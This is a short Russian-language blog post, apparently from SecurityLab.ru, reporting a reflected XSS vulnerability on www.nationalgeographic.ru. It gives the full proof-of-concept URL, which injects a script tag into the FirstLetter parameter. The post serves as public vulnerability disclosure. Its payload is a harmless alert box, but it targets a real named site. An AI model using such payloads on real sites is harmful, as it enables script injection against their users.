XSS на сайте www.nationalgeographic.ru

XSS на сайте www.nationalgeographic.ru
15 мин поиска и...

http://www.nationalgeographic.ru/Programmes/ProgrammesAz.aspx?FirstLetter=%3Cscript%3Ejavascript:alert();%3C/script%3E
nationalgeographic XSS
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
Хакеры ненавидят этот канал!

Спойлер: мы раскрываем их любимые трюки

Расстройте их планы — подпишитесь

Агиевич Игорь aka Shanker

Мысли о собственной жизни ИТ-аналитика, обретающие очертания в голове и формируемые средством их выражения - родной речью